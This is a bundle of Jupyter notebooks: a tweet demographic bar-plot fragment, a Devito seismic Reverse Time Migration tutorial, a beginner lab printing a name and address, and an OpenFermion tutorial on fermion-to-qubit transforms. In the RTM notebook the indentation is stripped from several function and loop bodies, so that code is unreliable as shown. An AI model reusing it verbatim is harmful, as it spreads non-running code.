counts_wae = counts_wae.reset_index().rename(columns = {'Number of Votes': 'Count'})
counts_wae
sns.barplot(x="Type", y="Count", data = counts_wae)
plt.title("Type Counts WAE")
# +
other = final_tweets[(final_tweets['Racial Demographic (All)'] == 2)] #| (final_tweets['Racial Demographic (All)'] == 0)]
counts_other = other.groupby("Type").count()
counts_other = counts_other.reset_index().rename(columns = {'Number of Votes': 'Count'})
sns.barplot(x="Type", y="Count", data = counts_other)
plt.title("Type Counts Other")
|
code/.ipynb_checkpoints/Racial Demographic Predictions on Tweets, Santiago and Ortiz-Copy1-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 02 - Reverse Time Migration
#
# This notebook is the second in a series of tutorials highlighting various aspects of seismic inversion based on Devito operators. In this second example we aim to highlight the core ideas behind seismic inversion, where we create an image of the subsurface from field-recorded data. This tutorial follows on from the modelling tutorial and will reuse the modelling operator and velocity model.
#
# ## Imaging requirement
#
# Seismic imaging relies on two known parameters:
#
# - **Field data** - or also called **recorded data**. This is a shot record corresponding to the true velocity model. In practice this data is acquired as described in the first tutorial. In order to simplify this tutorial we will generate synthetic field data by modelling it with the **true velocity model**.
#
# - **Background velocity model**. This is a velocity model that has been obtained by processing and inverting the field data. We will look at these methods in the following tutorial, as they rely on the method we describe here. This velocity model is usually a **smooth version** of the true velocity model.
# ## Imaging computational setup
#
# In this tutorial, we will introduce the back-propagation operator. This operator simulates the adjoint wave-equation, that is a wave-equation solved in a reversed time order. This time reversal led to the naming of the method we present here, called Reverse Time Migration. The notion of adjoint in exploration geophysics is fundamental as most of the wave-equation based imaging and inversion methods rely on adjoint based optimization methods.
#
# ## Notes on the operators
#
# As we have already described the creation of a forward modelling operator, we will use a thin wrapper function instead. This wrapper is provided by a utility class called `AcousticWaveSolver`, which provides all the necessary operators for seismic modeling, imaging and inversion. The `AcousticWaveSolver` provides a more concise API for common wave propagation operators and caches the Devito `Operator` objects to avoid unnecessary recompilation. However, any newly introduced operators will be fully described and only used from the wrapper in the next tutorials.
#
# As before we initialize printing and import some utilities. We also raise the Devito log level to avoid excessive logging for repeated operator invocations.
# +
import numpy as np
# %matplotlib inline
from devito import configuration
configuration['log_level'] = 'WARNING'
# -
# ## Computational considerations
#
# Seismic inversion algorithms are generally very computationally demanding and require a large amount of memory to store the forward wavefield. In order to keep this tutorial as lightweight as possible we are using a very simple
# velocity model that requires low temporal and spatial resolution. For a more realistic model, a second set of preset parameters for a reduced version of the 2D Marmousi data set [1] is provided below in comments. This can be run to create some more realistic subsurface images. However, this second preset is more computationally demanding and requires a slightly more powerful workstation.
# +
# Configure model presets
from examples.seismic import demo_model
# Enable model presets here:
preset = 'twolayer-isotropic' # A simple but cheap model (recommended)
# preset = 'marmousi2d-isotropic'  # A larger, more realistic model
# Standard preset with a simple two-layer model
if preset == 'twolayer-isotropic':
def create_model(grid=None):
return demo_model('twolayer-isotropic', origin=(0., 0.), shape=(101, 101),
spacing=(10., 10.), nbpml=20, grid=grid)
filter_sigma = (1, 1)
nshots = 21
nreceivers = 101
t0 = 0.
tn = 1000. # Simulation last 1 second (1000 ms)
f0 = 0.010 # Source peak frequency is 10Hz (0.010 kHz)
# A more computationally demanding preset based on the 2D Marmousi model
if preset == 'marmousi2d-isotropic':
def create_model(grid=None):
return demo_model('marmousi2d-isotropic', data_path='../../../../opesci-data/',
grid=grid)
filter_sigma = (6, 6)
    nshots = 301  # Need good coverage in shots, one every two grid points
    nreceivers = 601  # One receiver every grid point
t0 = 0.
tn = 3500. # Simulation last 3.5 second (3500 ms)
f0 = 0.025 # Source peak frequency is 25Hz (0.025 kHz)
# -
# # True and smooth velocity models
#
# First, we create the model data for the "true" model from a given demonstration preset. This model represents the subsurface topology for the purposes of this example and we will later use it to generate our synthetic data readings. We also generate a second model and apply a smoothing filter to it, which represents our initial model for the imaging algorithm. The perturbation between these two models can be thought of as the image we are trying to recover.
# +
#NBVAL_IGNORE_OUTPUT
from examples.seismic import plot_velocity, plot_perturbation
from scipy import ndimage
# Create true model from a preset
model = create_model()
# Create initial model and smooth the boundaries
model0 = create_model(grid=model.grid)
model0.vp = ndimage.gaussian_filter(model0.vp, sigma=filter_sigma, order=0)
# Plot the true and initial model and the perturbation between them
plot_velocity(model)
plot_velocity(model0)
plot_perturbation(model0, model)
# -
# ## Acquisition geometry
#
# Next we define the positioning and the wave signal of our source and the location of our receivers. To generate the wavelet for our source we require the discretized values of time that we are going to use to model a single "shot",
# which again depends on the grid spacing used in our model. For consistency this initial setup will look exactly as in the previous modelling tutorial, although we will vary the position of our source later on during the actual imaging algorithm.
# +
#NBVAL_IGNORE_OUTPUT
# Define acquisition geometry: source
from examples.seismic import TimeAxis, RickerSource
# Define time discretization according to grid spacing
dt = model.critical_dt # Time step from model grid spacing
time_range = TimeAxis(start=t0, stop=tn, step=dt)
src = RickerSource(name='src', grid=model.grid, f0=f0, time_range=time_range)
# First, position source centrally in all dimensions, then set depth
src.coordinates.data[0, :] = np.array(model.domain_size) * .5
src.coordinates.data[0, -1] = 20. # Depth is 20m
# We can plot the time signature to see the wavelet
src.show()
# +
# Define acquisition geometry: receivers
from examples.seismic import Receiver
# Initialize receivers for synthetic and imaging data
rec = Receiver(name='rec', grid=model.grid, npoint=nreceivers, time_range=time_range)
rec.coordinates.data[:, 0] = np.linspace(0, model.domain_size[0], num=nreceivers)
rec.coordinates.data[:, 1] = 30.
# -
# # True and smooth data
#
# We can now generate the shot record (receiver readings) corresponding to our true and initial models. The difference between these two records will be the basis of the imaging procedure.
#
# For this purpose we will use the same forward modelling operator that was introduced in the previous tutorial, provided by the `WaveSolver` utility class. This object instantiates a set of pre-defined operators according to an initial definition of the acquisition geometry, consisting of source and receiver symbols. The solver object caches the individual operators and provides a slightly higher-level API that allows us to invoke the modelling operators from the initial tutorial in a single line. In the following cells we use this to generate shot data by only specifying the respective model symbol `m` to use, and the solver will create and return a new `Receiver` object that represents the readings at the previously defined receiver coordinates.
# +
# Compute synthetic data with forward operator
from examples.seismic.acoustic import AcousticWaveSolver
solver = AcousticWaveSolver(model, src, rec, space_order=4)
true_d , _, _ = solver.forward(src=src, m=model.m)
# -
# Compute initial data with forward operator
smooth_d, _, _ = solver.forward(src=src, m=model0.m)
# +
#NBVAL_IGNORE_OUTPUT
# Plot shot record for true and smooth velocity model and the difference
from examples.seismic import plot_shotrecord
plot_shotrecord(true_d.data, model, t0, tn)
plot_shotrecord(smooth_d.data, model, t0, tn)
plot_shotrecord(smooth_d.data - true_d.data, model, t0, tn)
# -
# # Imaging with back-propagation
#
# As we explained in the introduction of this tutorial, this method is based on back-propagation.
#
# ## Adjoint wave equation
#
# If we go back to the modelling part, we can rewrite the simulation as a linear system solve:
#
# \begin{equation}
# \mathbf{A}(\mathbf{m}) \mathbf{u} = \mathbf{q}
# \end{equation}
#
# where $\mathbf{m}$ is the discretized square slowness, $\mathbf{q}$ is the discretized source and $\mathbf{A}(\mathbf{m})$ is the discretized wave-equation. The matrix representation of the discretized wave-equation is lower triangular and can be solved with forward substitution. Writing the forward substitution pointwise leads to the time-stepping stencil.
#
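# As a toy illustration (a hedged numpy sketch, not part of the tutorial's Devito code), the cell below solves a small lower-triangular system by forward substitution: each unknown depends only on previously computed ones, exactly like a time-stepping stencil.

```python
import numpy as np

# Lower-triangular system A u = q solved by forward substitution,
# visiting the unknowns in order -- the analogue of time stepping.
n = 5
A = np.tril(np.random.rand(n, n)) + n * np.eye(n)  # well-conditioned lower-triangular matrix
q = np.random.rand(n)

u = np.zeros(n)
for t in range(n):
    # u[t] depends only on the already-computed u[0..t-1]
    u[t] = (q[t] - A[t, :t] @ u[:t]) / A[t, t]

assert np.allclose(A @ u, q)
```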
# On a small problem one could form the matrix explicitly and transpose it to obtain the adjoint discrete wave-equation:
#
# \begin{equation}
# \mathbf{A}(\mathbf{m})^T \mathbf{v} = \delta \mathbf{d}
# \end{equation}
#
# where $\mathbf{v}$ is the discrete **adjoint wavefield** and $\delta \mathbf{d}$ is the data residual defined as the difference between the field/observed data and the synthetic data $\mathbf{d}_s = \mathbf{P}_r \mathbf{u}$. In our case we derive the discrete adjoint wave-equation from the discrete forward wave-equation to get its stencil.
#
# ## Imaging
#
# Wave-equation based imaging relies on one simple concept:
#
# - If the background velocity model is kinematically correct, the forward wavefield $\mathbf{u}$ and the adjoint wavefield $\mathbf{v}$ meet at the reflector positions at zero time offset.
#
# The sum over time of the zero time-offset correlation of these two fields then creates an image of the subsurface. Mathematically this leads to the simple imaging condition:
#
# \begin{equation}
# \text{Image} = \sum_{t=1}^{n_t} \mathbf{u}[t] \mathbf{v}[t]
# \end{equation}
#
# In the following tutorials we will describe a more advanced imaging condition that produces sharper and more accurate results.
#
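# The imaging condition above is just a zero time-offset correlation accumulated over time steps; a toy numpy sketch (illustrative only, not part of the tutorial's Devito code):

```python
import numpy as np

# image[x] = sum_t u[t, x] * v[t, x]  -- zero time-offset correlation
nt, nx = 100, 50
rng = np.random.default_rng(0)
u = rng.standard_normal((nt, nx))  # forward wavefield snapshots
v = rng.standard_normal((nt, nx))  # adjoint wavefield snapshots

image = np.zeros(nx)
for t in range(nt):
    image += u[t] * v[t]           # accumulate the correlation at each step

assert np.allclose(image, (u * v).sum(axis=0))
```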
# ## Operator
#
# We will now define the imaging operator that computes the adjoint wavefield $\mathbf{v}$ and correlates it with the forward wavefield $\mathbf{u}$. This operator essentially consists of three components:
# * Stencil update of the adjoint wavefield `v`
# * Injection of the data residual at the adjoint source (forward receiver) location
# * Correlation of `u` and `v` to compute the image contribution at each timestep
# +
# Define gradient operator for imaging
from devito import TimeFunction, Operator, Eq, solve
from examples.seismic import PointSource
def ImagingOperator(model, image):
# Define the wavefield with the size of the model and the time dimension
v = TimeFunction(name='v', grid=model.grid, time_order=2, space_order=4)
u = TimeFunction(name='u', grid=model.grid, time_order=2, space_order=4,
save=time_range.num)
# Define the wave equation, but with a negated damping term
eqn = model.m * v.dt2 - v.laplace - model.damp * v.dt
# Use `solve` to rearrange the equation into a stencil expression
stencil = Eq(v.backward, solve(eqn, v.backward))
# Define residual injection at the location of the forward receivers
dt = model.critical_dt
residual = PointSource(name='residual', grid=model.grid,
time_range=time_range,
coordinates=rec.coordinates.data)
res_term = residual.inject(field=v, expr=residual * dt**2 / model.m,
offset=model.nbpml)
# Correlate u and v for the current time step and add it to the image
image_update = Eq(image, image - u * v)
return Operator([stencil] + res_term + [image_update],
subs=model.spacing_map)
# -
# ## Implementation of the imaging loop
#
# As we just explained, the forward wave-equation is solved forward in time while the adjoint wave-equation is solved in reverse time order. Therefore, correlating these two fields over time requires storing one of them. The computational procedure for imaging follows:
#
# - Simulate the forward wave-equation with the background velocity model to get the synthetic data and save the full wavefield $\mathbf{u}$
# - Compute the data residual
# - Back-propagate the data residual and compute on the fly the image contribution at each time step.
#
# This procedure is applied to multiple source positions (shots) and summed to obtain the full image of the subsurface. We can first visualize the varying locations of the sources that we will use.
# +
#NBVAL_IGNORE_OUTPUT
# Prepare the varying source locations
source_locations = np.empty((nshots, 2), dtype=np.float32)
source_locations[:, 0] = np.linspace(0., 1000, num=nshots)
source_locations[:, 1] = 30.
plot_velocity(model, source=source_locations)
# +
# Run imaging loop over shots
from devito import Function, clear_cache
# Create image symbol and instantiate the previously defined imaging operator
image = Function(name='image', grid=model.grid)
op_imaging = ImagingOperator(model, image)
# Create a wavefield for saving to avoid memory overload
u0 = TimeFunction(name='u', grid=model0.grid, time_order=2, space_order=4,
save=time_range.num)
for i in range(nshots):
# Important: We force previous wavefields to be destroyed,
# so that we may reuse the memory.
clear_cache()
print('Imaging source %d out of %d' % (i+1, nshots))
# Update source location
src.coordinates.data[0, :] = source_locations[i, :]
# Generate synthetic data from true model
true_d, _, _ = solver.forward(src=src, m=model.m)
# Compute smooth data and full forward wavefield u0
u0.data.fill(0.)
smooth_d, _, _ = solver.forward(src=src, m=model0.m, save=True, u=u0)
# Compute gradient from the data residual
v = TimeFunction(name='v', grid=model.grid, time_order=2, space_order=4)
residual = smooth_d.data - true_d.data
op_imaging(u=u0, v=v, m=model0.m, dt=model0.critical_dt,
residual=residual)
# +
#NBVAL_IGNORE_OUTPUT
from examples.seismic import plot_image
# Plot the inverted image
plot_image(np.diff(image.data, axis=1))
# -
assert np.isclose(np.linalg.norm(image.data), 1e6, rtol=1e1)
# And we have an image of the subsurface with a strong reflector at the original location.
# ## References
#
# [1] _<NAME>. & <NAME>. (eds.) (1991): The Marmousi experience. Proc. EAGE workshop on Practical Aspects of Seismic Data Inversion (Copenhagen, 1990), Eur. Assoc. Explor. Geophysicists, Zeist._
|
examples/seismic/tutorials/02_rtm.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/VinceDeilord/CPEN21A-ECE-2-1/blob/main/Lab1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="itaUuRMMti0s"
# Laboratory 1
# + colab={"base_uri": "https://localhost:8080/"} id="aZrij4dktt2A" outputId="19117ac8-38d2-45bb-839d-122d2ae7f841"
a = "Welcome to Python programming"
b = "Name: <NAME>"
c = "Address: 378 Kaybagal Central, Tagaytay City"
d = "Age: 19 years old"
print(a)
print(b)
print(c)
print(d)
|
Lab1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
if 'google.colab' in sys.modules:
# !pip install openfermion --quiet
# # The Jordan-Wigner and Bravyi-Kitaev Transforms
#
# ## Ladder operators and the canonical anticommutation relations
#
# A system of $N$ fermionic modes is
# described by a set of fermionic *annihilation operators*
# $\{a_p\}_{p=0}^{N-1}$ satisfying the *canonical anticommutation relations*
# $$\begin{aligned}
# \{a_p, a_q\} &= 0, \label{eq:car1} \\
# \{a_p, a^\dagger_q\} &= \delta_{pq}, \label{eq:car2}
# \end{aligned}$$ where $\{A, B\} := AB + BA$. The adjoint
# $a^\dagger_p$ of an annihilation operator $a_p$ is called a *creation
# operator*, and we refer to creation and annihilation operators as
# fermionic *ladder operators*.
# In a finite-dimensional vector space the anticommutation relations have the following consequences:
#
# - The operators $\{a^\dagger_p a_p\}_{p=0}^{N-1}$ commute with each
# other and have eigenvalues 0 and 1. These are called the *occupation
# number operators*.
#
# - There is a normalized vector $\lvert{\text{vac}}\rangle$, called the *vacuum
# state*, which is a mutual 0-eigenvector of all
# the $a^\dagger_p a_p$.
#
# - If $\lvert{\psi}\rangle$ is a 0-eigenvector of $a_p^\dagger a_p$, then
# $a_p^\dagger\lvert{\psi}\rangle$ is a 1-eigenvector of $a_p^\dagger a_p$.
# This explains why we say that $a_p^\dagger$ creates a fermion in
# mode $p$.
#
# - If $\lvert{\psi}\rangle$ is a 1-eigenvector of $a_p^\dagger a_p$, then
# $a_p\lvert{\psi}\rangle$ is a 0-eigenvector of $a_p^\dagger a_p$. This
# explains why we say that $a_p$ annihilates a fermion in mode $p$.
#
# - $a_p^2 = 0$ for all $p$. One cannot create or annihilate a fermion
# in the same mode twice.
#
# - The set of $2^N$ vectors
# $$\lvert n_0, \ldots, n_{N-1} \rangle :=
# (a^\dagger_0)^{n_0} \cdots (a^\dagger_{N-1})^{n_{N-1}} \lvert{\text{vac}}\rangle,
# \qquad n_0, \ldots, n_{N-1} \in \{0, 1\}$$
# are orthonormal. We can assume they form a basis for the entire vector space.
#
# - The annihilation operators $a_p$ act on this basis as follows:
# $$\begin{aligned} a_p \lvert n_0, \ldots, n_{p-1}, 1, n_{p+1}, \ldots, n_{N-1} \rangle &= (-1)^{\sum_{q=0}^{p-1} n_q} \lvert n_0, \ldots, n_{p-1}, 0, n_{p+1}, \ldots, n_{N-1} \rangle \,, \\ a_p \lvert n_0, \ldots, n_{p-1}, 0, n_{p+1}, \ldots, n_{N-1} \rangle &= 0 \,.\end{aligned}$$
#
# See [here](http://michaelnielsen.org/blog/archive/notes/fermions_and_jordan_wigner.pdf) for a derivation and discussion of these
# consequences.
#
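# Before turning to OpenFermion, here is a minimal numpy check (an illustrative sketch, not library code) of these relations for a single mode, using the explicit $2 \times 2$ matrix $a = \lvert{0}\rangle\langle{1}\rvert$:

```python
import numpy as np

# Single-mode check of the canonical anticommutation relations with an
# explicit 2x2 annihilation operator a = |0><1|.
a = np.array([[0., 1.],
              [0., 0.]])
ad = a.conj().T                      # creation operator a^dagger

anticomm = lambda A, B: A @ B + B @ A

assert np.allclose(a @ a, 0)                     # cannot annihilate twice
assert np.allclose(anticomm(a, ad), np.eye(2))   # {a, a^dagger} = I
num = ad @ a                                     # occupation number operator
assert np.allclose(np.linalg.eigvalsh(num), [0., 1.])
```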
# ## Mapping fermions to qubits with transforms
#
# To simulate a system of fermions on a quantum computer, we must choose a representation of the ladder operators on the Hilbert space of the qubits. In other words, we must designate a set of qubit operators (matrices) which satisfy the canonical anticommutation relations. Qubit operators are written in terms of the Pauli matrices $X$, $Y$, and $Z$. In OpenFermion a representation is specified by a transform function which maps fermionic operators (typically instances of FermionOperator) to qubit operators (instances of QubitOperator). In this demo we will discuss the Jordan-Wigner and Bravyi-Kitaev transforms, which are implemented by the functions `jordan_wigner` and `bravyi_kitaev`.
#
# ### The Jordan-Wigner Transform
# Under the Jordan-Wigner Transform (JWT), the annihilation operators are mapped to qubit operators as follows:
# $$\begin{aligned}
# a_p &\mapsto \frac{1}{2} (X_p + \mathrm{i}Y_p) Z_0 \cdots Z_{p - 1} \\
# &= (\lvert{0}\rangle\langle{1}\rvert)_p Z_0 \cdots Z_{p - 1} \\
# &=: \tilde{a}_p.
# \end{aligned}$$
#
# This operator has the following action on a computational basis vector
# $\lvert z_0, \ldots, z_{N-1} \rangle$:
# $$\begin{aligned}
# \tilde{a}_p \lvert z_0, \ldots, z_{p-1}, 1, z_{p+1}, \ldots, z_{N-1} \rangle &=
# (-1)^{\sum_{q=0}^{p-1} z_q} \lvert z_0, \ldots, z_{p-1}, 0, z_{p+1}, \ldots, z_{N-1} \rangle \\
# \tilde{a}_p \lvert z_0, \ldots, z_{p-1}, 0, z_{p+1}, \ldots, z_{N-1} \rangle &= 0.
# \end{aligned}$$
#
# Note that $\lvert n_0, \ldots, n_{N-1} \rangle$ is a basis vector in the Hilbert space of fermions, while $\lvert z_0, \ldots, z_{N-1} \rangle$ is a basis vector in the Hilbert space of qubits. Similarly, in OpenFermion $a_p$ is a FermionOperator while $\tilde{a}_p$ is a QubitOperator.
#
# Let's instantiate some FermionOperators, map them to QubitOperators using the JWT, and check that the resulting operators satisfy the expected relations.
# +
from openfermion import *
# Create some ladder operators
annihilate_2 = FermionOperator('2')
create_2 = FermionOperator('2^')
annihilate_5 = FermionOperator('5')
create_5 = FermionOperator('5^')
# Construct occupation number operators
num_2 = create_2 * annihilate_2
num_5 = create_5 * annihilate_5
# Map FermionOperators to QubitOperators using the JWT
annihilate_2_jw = jordan_wigner(annihilate_2)
create_2_jw = jordan_wigner(create_2)
annihilate_5_jw = jordan_wigner(annihilate_5)
create_5_jw = jordan_wigner(create_5)
num_2_jw = jordan_wigner(num_2)
num_5_jw = jordan_wigner(num_5)
# Create QubitOperator versions of zero and identity
zero = QubitOperator()
identity = QubitOperator(())
# Check the canonical anticommutation relations
assert anticommutator(annihilate_5_jw, annihilate_2_jw) == zero
assert anticommutator(annihilate_5_jw, annihilate_5_jw) == zero
assert anticommutator(annihilate_5_jw, create_2_jw) == zero
assert anticommutator(annihilate_5_jw, create_5_jw) == identity
# Check that the occupation number operators commute
assert commutator(num_2_jw, num_5_jw) == zero
# Print some output
print("annihilate_2_jw = \n{}".format(annihilate_2_jw))
print('')
print("create_2_jw = \n{}".format(create_2_jw))
print('')
print("annihilate_5_jw = \n{}".format(annihilate_5_jw))
print('')
print("create_5_jw = \n{}".format(create_5_jw))
print('')
print("num_2_jw = \n{}".format(num_2_jw))
print('')
print("num_5_jw = \n{}".format(num_5_jw))
# -
# ### The parity transform
#
# By comparing the action of $\tilde{a}_p$ on $\lvert z_0, \ldots, z_{N-1} \rangle$ in the JWT with the action of $a_p$ on $\lvert n_0, \ldots, n_{N-1} \rangle$ (described in the first section of this demo), we can see that the JWT is associated with a particular mapping of bitstrings $e: \{0, 1\}^N \to \{0, 1\}^N$, namely, the identity map $e(x) = x$. In other words, under the JWT, the fermionic basis vector $\lvert n_0, \ldots, n_{N-1} \rangle$ is represented by the computational basis vector $\lvert z_0, \ldots, z_{N-1} \rangle$, where $z_p = n_p$ for all $p$. We can write this as
# $$\lvert x \rangle \mapsto \lvert e(x) \rangle,$$
# where the vector on the left is fermionic and the vector on the right is qubit. We call the mapping $e$ an *encoder*.
#
# There are other transforms which are associated with different encoders. To see why we might be interested in these other transforms, observe that under the JWT, $\tilde{a}_p$ acts not only on qubit $p$ but also on qubits $0, \ldots, p-1$. This means that fermionic operators with low weight can get mapped to qubit operators with high weight, where by weight we mean the number of modes or qubits an operator acts on. There are some disadvantages to having high-weight operators; for instance, they may require more gates to simulate and are more expensive to measure on some near-term hardware platforms. In the worst case, the annihilation operator on the last mode will map to an operator which acts on all the qubits. To emphasize this point let's apply the JWT to the annihilation operator on mode 99:
print(jordan_wigner(FermionOperator('99')))
# The purpose of the string of Pauli $Z$'s is to introduce the phase factor $(-1)^{\sum_{q=0}^{p-1} n_q}$ when acting on a computational basis state; when $e$ is the identity encoder, the modulo-2 sum $\sum_{q=0}^{p-1} n_q$ is computed as $\sum_{q=0}^{p-1} z_q$, which requires reading $p$ bits and leads to a Pauli $Z$ string with weight $p$. A simple solution to this problem is to consider instead the encoder defined by
# $$e(x)_p = \sum_{q=0}^p x_q \quad (\text{mod 2}),$$
# which is associated with the mapping of basis vectors
# $\lvert n_0, \ldots, n_{N-1} \rangle \mapsto \lvert z_0, \ldots, z_{N-1} \rangle,$
# where $z_p = \sum_{q=0}^p n_q$ (again addition is modulo 2). With this encoding, we can compute the sum $\sum_{q=0}^{p-1} n_q$ by reading just one bit because this is the value stored by $z_{p-1}$. The associated transform is called the parity transform because the $p$-th qubit is storing the parity (modulo-2 sum) of modes $0, \ldots, p$. Under the parity transform, annihilation operators are mapped as follows:
# $$\begin{aligned}
# a_p &\mapsto \frac{1}{2} (X_p Z_{p - 1} + \mathrm{i}Y_p) X_{p + 1} \cdots X_{N - 1} \\
# &= \frac{1}{4} [(X_p + \mathrm{i} Y_p) (I + Z_{p - 1}) -
# (X_p - \mathrm{i} Y_p) (I - Z_{p - 1})]
# X_{p + 1} \cdots X_{N - 1} \\
# &= [(\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{0}\rangle\langle{0}\rvert)_{p - 1} -
# (\lvert{1}\rangle\langle{0}\rvert)_p (\lvert{1}\rangle\langle{1}\rvert)_{p - 1}]
# X_{p + 1} \cdots X_{N - 1} \\
# \end{aligned}$$
#
# The term in brackets in the last line means "if $z_p = n_p$ then annihilate in mode $p$; otherwise, create in mode $p$ and attach a minus sign". The value stored by $z_{p-1}$ contains the information needed to determine whether a minus sign should be attached or not. However, now there is a string of Pauli $X$'s acting on modes $p+1, \ldots, N-1$ and hence using the parity transform also yields operators with high weight. These Pauli $X$'s perform the necessary update to $z_{p+1}, \ldots, z_{N-1}$ which is needed if the value of $n_{p}$ changes. In the worst case, the annihilation operator on the first mode will map to an operator which acts on all the qubits.
#
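# A minimal sketch of the parity encoder itself (illustrative only, not OpenFermion's implementation): $e$ is just a cumulative XOR along the occupation string.

```python
import numpy as np

# Parity encoder: e(x)_p = x_0 + ... + x_p (mod 2),
# i.e. a cumulative XOR along the bitstring.
def parity_encode(x):
    return [int(b) for b in np.cumsum(x) % 2]

occupations = [1, 0, 1, 1, 0]
encoded = parity_encode(occupations)
assert encoded == [1, 1, 0, 1, 1]
# Reading the parity of modes 0..p now takes a single bit: encoded[p].
```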
# Since the parity transform does not offer any advantages over the JWT, OpenFermion does not include a standalone function to perform it. However, there is functionality for defining new transforms by specifying an encoder and decoder pair, also known as a binary code (in our examples the decoder is simply the inverse mapping), and the binary code which defines the parity transform is included in the library as an example. See [Lowering qubit requirements using binary codes](./binary_code_transforms_demo.ipynb) for a demonstration of this functionality and how it can be used to reduce the qubit resources required for certain applications.
#
# Let's use this functionality to map our previously instantiated FermionOperators to QubitOperators using the parity transform with 10 total modes and check that the resulting operators satisfy the expected relations.
# +
# Set the number of modes in the system
n_modes = 10
# Define a function to perform the parity transform
def parity(fermion_operator, n_modes):
return binary_code_transform(fermion_operator, parity_code(n_modes))
# Map FermionOperators to QubitOperators using the parity transform
annihilate_2_parity = parity(annihilate_2, n_modes)
create_2_parity = parity(create_2, n_modes)
annihilate_5_parity = parity(annihilate_5, n_modes)
create_5_parity = parity(create_5, n_modes)
num_2_parity = parity(num_2, n_modes)
num_5_parity = parity(num_5, n_modes)
# Check the canonical anticommutation relations
assert anticommutator(annihilate_5_parity, annihilate_2_parity) == zero
assert anticommutator(annihilate_5_parity, annihilate_5_parity) == zero
assert anticommutator(annihilate_5_parity, create_2_parity) == zero
assert anticommutator(annihilate_5_parity, create_5_parity) == identity
# Check that the occupation number operators commute
assert commutator(num_2_parity, num_5_parity) == zero
# Print some output
print("annihilate_2_parity = \n{}".format(annihilate_2_parity))
print('')
print("create_2_parity = \n{}".format(create_2_parity))
print('')
print("annihilate_5_parity = \n{}".format(annihilate_5_parity))
print('')
print("create_5_parity = \n{}".format(create_5_parity))
print('')
print("num_2_parity = \n{}".format(num_2_parity))
print('')
print("num_5_parity = \n{}".format(num_5_parity))
# -
# Now let's map one of the FermionOperators again but with the total number of modes set to 100.
print(parity(annihilate_2, 100))
# Note that with the JWT, it is not necessary to specify the total number of modes in the system because $\tilde{a}_p$ only acts on qubits $0, \ldots, p$ and not any higher ones.
# ### The Bravyi-Kitaev transform
#
# The discussion above suggests that we can think of the action of a transformed annihilation operator $\tilde{a}_p$ on a computational basis vector $\lvert z \rangle$ as a 4-step classical algorithm:
# 1. Check if $n_p = 0$. If so, then output the zero vector. Otherwise,
# 2. Update the bit stored by $z_p$.
# 3. Update the rest of the bits $z_q$, $q \neq p$.
# 4. Multiply by the parity $\sum_{q=0}^{p-1} n_q$.
#
# Under the JWT, Steps 1, 2, and 3 are represented by the operator $(\lvert{0}\rangle\langle{1}\rvert)_p$ and Step 4 is accomplished by the operator $Z_{0} \cdots Z_{p-1}$ (Step 3 actually requires no action).
# Under the parity transform, Steps 1, 2, and 4 are represented by the operator
# $(\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{0}\rangle\langle{0}\rvert)_{p - 1} -
# (\lvert{0}\rangle\langle{1}\rvert)_p (\lvert{1}\rangle\langle{1}\rvert)_{p - 1}$ and Step 3 is accomplished by the operator $X_{p+1} \cdots X_{N-1}$.
#
# To obtain a simpler description of these and other transforms (with an aim at generalizing), it is better to put aside the ladder operators and work with an alternative set of $2N$ operators defined by
# $$c_p = a_p + a_p^\dagger\,, \qquad d_p = -\mathrm{i} (a_p - a_p^\dagger)\,.$$
# These operators are known as Majorana operators. Note that if we describe how Majorana operators should be transformed, then we also know how the annihilation operators should be transformed, since
# $$a_p = \frac{1}{2} (c_p + \mathrm{i} d_p).$$
#
# For simplicity, let's consider just the $c_p$; the $d_p$ are treated similarly. The action of $c_p$ on a fermionic basis vector is given by
# $$c_p \lvert n_0, \ldots, n_{p-1}, n_p, n_{p+1}, \ldots, n_{N-1} \rangle =
# (-1)^{\sum_{q=0}^{p-1} n_q} \lvert n_0, \ldots, n_{p-1}, 1 - n_p, n_{p+1}, \ldots, n_{N-1} \rangle$$
#
# In words, $c_p$ flips the occupation of mode $p$ and multiplies by the ever-present parity factor. If we transform $c_p$ to a qubit operator $\tilde{c}_p$, we should be able to describe the action of $\tilde{c}_p$ on a computational basis vector $\lvert z \rangle$ with a 2-step classical algorithm:
# 1. Update the string $z$ to a new string $z'$.
# 2. Multiply by the parity $\sum_{q=0}^{p-1} n_q$.
#
# Step 1 amounts to flipping some bits, so it will be performed by some Pauli $X$'s, and Step 2 will be performed by some Pauli $Z$'s. So $\tilde{c}_p$ should take the form
# $$\tilde{c}_p = X_{U(p)} Z_{P(p - 1)},$$
# where $U(j)$ is the set of bits that need to be updated upon flipping $n_j$, and $P(j)$ is a set of bits that stores the sum $\sum_{q=0}^{j} n_q$ (let's define $P(-1)$ to be the empty set). Let's see how this looks under the JWT and parity transforms.
# +
# Create a Majorana operator from our existing operators
c_5 = annihilate_5 + create_5
# Set the number of modes (required for the parity transform)
n_modes = 10
# Transform the Majorana operator to a QubitOperator in two different ways
c_5_jw = jordan_wigner(c_5)
c_5_parity = parity(c_5, n_modes)
# Print some output
print("c_5_jw = \n{}".format(c_5_jw))
print('')
print("c_5_parity = \n{}".format(c_5_parity))
# -
# For the JWT, $U(j) = \{j\}$ and $P(j) = \{0, \ldots, j\}$, whereas for the parity transform, $U(j) = \{j, \ldots, N-1\}$ and $P(j) = \{j\}$. The size of these sets can be as large as $N$, the total number of modes. These sets are determined by the encoding function $e$.
#
